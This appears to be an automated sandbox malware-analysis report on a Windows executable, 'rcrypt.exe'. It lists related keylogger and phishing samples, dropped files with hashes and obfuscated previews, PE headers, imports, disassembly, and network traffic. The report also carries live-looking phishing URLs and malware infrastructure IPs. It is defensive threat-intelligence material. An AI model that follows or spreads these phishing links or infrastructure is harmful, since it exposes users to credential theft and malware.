	SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	afRggioa9s.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	afRggioa9s.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	Purchase Order.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	188.114.96.3
	List & Sample_Doc3.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Confirmation transfer Copy AGS # 24-00379.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Apixaban - August 2024.XLS.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	SMLCHtAAMK.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	KQtHehIECg.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	roquette.com PURCHASE ORDER.htm	Get hash	malicious	Unknown	Browse	149.154.167.220
	nJC3400-GS SICO NEW ORLEANS.pif.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	abrirpdf_45868.msi	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	231210-06-AgentTesla-9da180.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	231210-04-AgentTesla-38a0d6.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	1E7BF321ECF78820F9422AD944E55288C5DBF0787DDAFD97120791A0DBBCE80A.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Purchase Order POT-247110.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://jf8nnsk.vk.com////away.php?to=https://brandequity.economictimes.indiatimes.com/etl.php?url=drarclimatizacao.com.br/dayo/tp5ri/VmFuZGVuYnVsY2tlLkFsZXhpc0BkZW1lLWdyb3VwLmNvbQ==$%C3%A3%E2%82%AC%E2%80%9A	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://valid-check-tl-3.azurewebsites.net	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://pub-497a80e8d2fd4e6d89056d4d5bf5c56d.r2.dev/hefty%2Fheavy.html?folder=DM0aNq7&snclavalin#hannah.brown@snclavalin.uk	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\rcrypt.exe
File Type:	ASCII text, with very long lines (28674), with no line terminators
Category:	dropped
Size (bytes):	28674
Entropy (8bit):	3.5752314699879224
Encrypted:	false
SSDEEP:	192:aIU0YzxURqp0m5Y+25yeDE49yry+a9ydKKqQl8Ep1zMHPLD1LXVBvbcENwwZUU1J:rYzxrp0FwaI4EYVLXDXZZRdj8Z8d4509
MD5:	891929EFB54665543C99035EB32B76C1
SHA1:	933AD49343A4620B4244A1099DD230A107757A18
SHA-256:	2D1A579585B81EB260A2951D40054ABC947BF302A16A1A412061209385908303
SHA-512:	4C6D5738587C755F3DEEF0AAF4267D4490967A294CC9D86561201EE82F6ADD612E523BCEF95C7C02572E66748A119DE3CA7F5C1CAFBDC99F597F7B72B0BA3F1D
Malicious:	false
Reputation:	low
Preview:	1y669cfd92fddd1311116768c97c111111779:5695c:76111111779:5e97cb83111111779:6699c97f111111779:569bc:76111111779:5e9dcb7d111111779:669fc944111111779:56:1c:43111111779:5e:3cb3f111111779:66:5c975111111779:56:7c:7d111111779:5e:9cb7d111111779:66:b44d1779:56:dc:7f111111779:9e55ggggggcb85111111779::657ggggggc975111111779:9659ggggggc:7d111111779:9e5bggggggcb7d111111779::65dggggggc93f111111779:965fggggggc:75111111779:9e61ggggggcb7d111111779::663ggggggc97d111111779:9665gggggg44d:779:9e67ggggggcb86111111779:66e1c984111111779:56e3c:76111111779:5ee5cb83111111779:66e7c944111111779:56e9c:43111111779:5eebcb3f111111779:66edc975111111779:56efc:7d111111779:5ef1cb7d111111779:66f344d1779:56f5c:72111111779:9e79ggggggcb75111111779::67bggggggc987111111779:967dggggggc:72111111779:9e7fggggggcb81111111779::681ggggggc97:111111779:9683ggggggc:44111111779:9e85ggggggcb43111111779::687ggggggc93f111111779:9689ggggggc:75111111779:9e8bggggggcb7d111111779::68dggggggc97d111111779:968fgggggg44d:779:5e91cb84111111779:66b1c979

C:\Users\user\AppData\Local\Temp\aut63AD.tmp

Download File

Process:	C:\Users\user\Desktop\rcrypt.exe
File Type:	data
Category:	dropped
Size (bytes):	242996
Entropy (8bit):	7.978841009672462
Encrypted:	false
SSDEEP:	6144:OovXrxfhfl1Vd27qpsAYfKCCP12clP2ILsO9c:Hj9b1/6qpMf+N2WLs
MD5:	43A0E5047B09EB5E4BCA8E6379B9B70E
SHA1:	CCBEE6E62ED02B0CDF663CAF8E7AA882D8E73000
SHA-256:	D14D9A257014613724DE6198C06173C581BC069FAFF574C8F0C8D82794333E57
SHA-512:	C4B44A392B8D726726738AF464FB65EA2FEC2F34A662C9066980DB506E126D118362D5B7F1157D8F1B5DB36264FDFB56C6EB2F0B2E91445DB20325759762F356
Malicious:	false
Reputation:	low
Preview:	EA06.....B..Zuf.R.U..G&.P.Ui...B......Z...;5...Z..W.~.}_.\.........NfWz4..Q..&....u>.H..y.ZO8...s.R...N'.)...B.]...^..n.9..U\|.oi...rW..L%.....\..%..&.Oc...P....s.J.2.,..w....}...v.I.@...Q4... ...[.....0X....R.RO.B".9.}J.U..+.j."oU..i......8Q@...D.8.......O.U@.33...F.6..&.]...R.U.....q....p.b.t.3..>....d5Y.G.7.P.2...V....{j..@.s...R..I...t..8......p.U.j..W.m...W.4.A#..T........`.G.v..c6...A1..l..E............M..9\.A3..:y...kO.........Q.....%...;..?..m5..r.S.m.../.?....J...A....M...T....77...?Y..W....j......W..m.J.Y.Pj.h.....i.y....z.. .Xg....A...k.G.P....Z.......M.l5....X.ej....O.Jjq.e_...._.E:...T.. H.m,.DhU-~._..`$.)..Z....nD.c......G#P....>D;.Q..@....u......_.vc.JMcg...#......Pj.k>.....mw.{..;..b.Y..@B...~..$6...[_.s...Bs...5..We...........u...&..c.=MU..R.d..Z$.YU...[.G_{(.I....wow.6;.Z...O..;w..W?..P.P....U'..\|..G.M<...-..t.wj$....;...@....j...r)..........[z.I.^.Y........j`..Z..k...M&........>....W..v.e..\|\|..V.Y.I....+#q.S..^l.....6..F

C:\Users\user\AppData\Local\Temp\aut640C.tmp

Download File

Process:	C:\Users\user\Desktop\rcrypt.exe
File Type:	data
Category:	dropped
Size (bytes):	9718
Entropy (8bit):	7.628822916555129
Encrypted:	false
SSDEEP:	192:ZfyKC/lyEAZDgmFVZYQl/sumysD8X7JHhwlct7GSMHHYhTz:Ry5NyVDgaLEPD8lHhVKfHeTz
MD5:	BD749C66FEB3B9086F3DA1282FF4387F
SHA1:	1969992F2F40CB62E5240ED5883A8BA0624C1786
SHA-256:	6FB2EF3A41D90A98A1D6F3080C8F115DDE8E5A5A6A650875D11A5307297DD550
SHA-512:	7A1C343C1CD265C79B2BA6547387B7C81F9220150FCD6D73304D78CE19436180A3D7B79FEE5C8B9291E7AC16D3EFAF70A41F2AF8580F197C0139551BF0BA3A04
Malicious:	false
Reputation:	low
Preview:	EA06..p...f.i..d...K%.c3....i..qc...`...c7..gSY..kc.M...]....)...K........\|. .o..c.M......9.M...:...S@...l.....3.Z..m:..6.P.o.n..Y......g.:.M&.@..Y....N.l.Y.........:.Mf....r.'3i...c ....Ab.H..... .F.3<..Y..6...,.b....`...x..l....Bt.....X..0.M.....p...Yf`5_..j....f.5_..r.U..l@5_....U..l.5_..b.U..`5\..>3 ..M.^.b.Z..m7.z..q7......@.....S...G../Z...@.....jt....p.u....$.p./.q9...g.G_T......,.>_.......zm6....y....S0...................`.M..`... ...d...@..0.'.5...{>K...c..sP..X..._..r......>K.#G.c..3\|vI..G.5..&`8_..md..i\|vI....d.h.,. ......%..8...[=....&.@;..9...@.L..6y..f..+ .ffV9...7..l....f. .E...Y....3.Y.............vY.....@.....2p....<d....,vd.........!+ .'&@....,fq3.Yl.9.......r.3.X...c3{,.gg.Y.!...Gf`....,f.:.Nl.. .#8.....c.@........r.h.s.....,vh......t.....40.....f.....fS....4..@.6.-..p..S.5..3...S@.N..;6.`..:..l....m9.....c.`..Y.S.wx.....vn......`.E.....@y6....p.c3.-..5..b.!....F ....B5d..'S........vp......f6K-.t...B3`...@.;9.X...b.....(........g ...L..{4..d...

C:\Users\user\AppData\Local\Temp\holloing

Download File

Process:	C:\Users\user\Desktop\rcrypt.exe
File Type:	data
Category:	dropped
Size (bytes):	248832
Entropy (8bit):	7.843281995168921
Encrypted:	false
SSDEEP:	6144:x/uDBzQQ1FNN1wyVn1KP/C1MHHX6bBM6UmHmWtmzG:x2xQQ191JIk43YBM6USmPG
MD5:	F5978F7A50EFE752057C63512C5012B4
SHA1:	0CC9956670B7DA347B438A033E0939D842F3013B
SHA-256:	339C42EFDB9F554E3FEE42C461AC2D0F4C4D58645478F460CD0C3D1919896C0B
SHA-512:	D6485C9F40C548C131A30E69AB7807643CA9AC01B3AFFD793BA500AE107C7E419E0C059243B531AE7CA5C400F20EC98FA7285BC7955D0BAC90C124BFBA3D7533
Malicious:	false
Reputation:	low
Preview:	...UNYORTTPA..UP.UMYORPT.AW6UP6UMYORPTPAW6UP6UMYORPTPAW6UP6U.YOR^K.OW.\...L..s.<92wF'?Q',4o11:>.#.75.'87o;>t....8?R0cTBXtTPAW6UP^E.tc#.\|0.Hy!.+.z0,o%.?\....$.'c#..0.HgsX+Q(.,bw9?.G...v6'b#.*.(4^y!.+MYORPTPAW6UP6UMY...2PAW6..6U.XKR$.P.W6UP6UMY.RsU[@^6U.7UMiMRPTPAx.UP6EMYO.QTPA.6U@6UM[ORUTPAW6UP3UMYORPTPQS6UT6U.bMRRTP.W6EP6EMYOR@TPQW6UP6U]YORPTPAW6UP.@OY.RPTP!U6..7UMYORPTPAW6UP6UMYORPTPAW6..7UQYORPTPAW6UP6UMYORPTPAW6UP6U.TMR.TPAW6UP6UMYO.QT.@W6UP6UMYORPTPAW6UP6UMYORPT~52N!P6UU.NRPDPAW.TP6QMYORPTPAW6UP6UmYO2~&4 #WUP.8MYO.QTP/W6U.7UMYORPTPAW6UPvUM.a61 1AW6.`6UMyMRPBPAW<WP6UMYORPTPAW6.P6.c+< 3TPA.TP65OYO.QTPaU6UP6UMYORPTPA.6U.6UMYORPTPAW6UP6UMYORPTPAW6UP6UMYORPTPAW6UP6UMYORPTPAW6UP6UMYORPTPAW6UP6UMYORPTPAW6UP6UMYORPTPAW6UP6UMYORPTPAW6UP6UMYORPTPAW6UP6UMYORPTPAW6UP6UMYORPTPAW6UP6UMYORPTPAW6UP6UMYORPTPAW6UP6UMYORPTPAW6UP6UMYORPTPAW6UP6UMYORPTPAW6UP6UMYORPTPAW6UP6UMYORPTPAW6UP6UMYORPTPAW6UP6UMYORPTPAW6UP6UMYORPTPAW6UP6UMYORPTPAW6UP6UMYORPTPAW6UP6UMYORPTPAW6UP6UMYORPTPAW6UP6UMYORPTPAW6UP6UMY

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.10495280601298
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	rcrypt.exe
File size:	1'155'072 bytes
MD5:	f91e3211d607a74a7635027718dd9701
SHA1:	cb9584d3ce55ab6191d79f841ab135404b733e6d
SHA256:	6e1995af5434855d121995cd5d5e2c6bcfd3bca269845b0579bc8e133784732d
SHA512:	45fea237a179ffcdef01cfe666f625d22e0dcda24557cabe69acccd2ef0a8bed6f64df82d76361b690ff3e3c95c0c2b08d36f2cccd8953b84eb3182c1cef8f63
SSDEEP:	24576:cAHnh+eWsN3skA4RV1Hom2KXMmHaqAktvLbWu9xk5:7h+ZkldoPK8YaqAktva
TLSH:	2B35AD0273D6C036FFAB92739B6AB24156BC79254133852F13981DB9BD701B2273E663
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x42800a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66970A69 [Wed Jul 17 00:03:53 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007FACD19EFCFDh
jmp 00007FACD19E2AB4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FACD19E2C3Ah
cmp edi, eax
jc 00007FACD19E2F9Eh
bt dword ptr [004C41FCh], 01h
jnc 00007FACD19E2C39h
rep movsb
jmp 00007FACD19E2F4Ch
cmp ecx, 00000080h
jc 00007FACD19E2E04h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FACD19E2C40h
bt dword ptr [004BF324h], 01h
jc 00007FACD19E3110h
bt dword ptr [004C41FCh], 00000000h
jnc 00007FACD19E2DDDh
test edi, 00000003h
jne 00007FACD19E2DEEh
test esi, 00000003h
jne 00007FACD19E2DCDh
bt edi, 02h
jnc 00007FACD19E2C3Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FACD19E2C43h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FACD19E2C95h
bt esi, 03h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc0cc	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0x4f95c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x118000	0x7134	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4b50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dfdd	0x8e000	310e36668512d53489c005622bb1b4a9	False	0.5735602580325704	data	6.675248351711057	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2fd8e	0x2fe00	748cf1ab2605ce1fd72d53d912abb68f	False	0.32828818537859006	data	5.763244005758284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbf000	0x8f74	0x5200	aae9601d920f07080bdfadf43dfeff12	False	0.1017530487804878	data	1.1963819235530628	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc8000	0x4f95c	0x4fa00	a5e0b854c42eb096b3b07025d0a46ccf	False	0.9197256426609105	data	7.878370979705858	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x118000	0x7134	0x7200	f04128ad0f87f42830e4a6cdbc38c719	False	0.7617530153508771	data	6.783955557128661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc84a0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc85c8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc88b0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc89d8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc9880	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xca128	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xca690	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xccc38	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcdce0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_STRING	0xce148	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xce6dc	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xced68	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcf1f8	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcf7f4	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcfe50	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xd02b8	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xd0410	0x46ff2	data			1.0003301215259868
RT_GROUP_ICON	0x117404	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x11747c	0x14	data	English	Great Britain	1.15
RT_VERSION	0x117490	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x11756c	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 24, 2024 14:47:27.016381025 CEST	49706	80	192.168.2.9	158.101.44.242
Jul 24, 2024 14:47:27.021416903 CEST	80	49706	158.101.44.242	192.168.2.9
Jul 24, 2024 14:47:27.021491051 CEST	49706	80	192.168.2.9	158.101.44.242
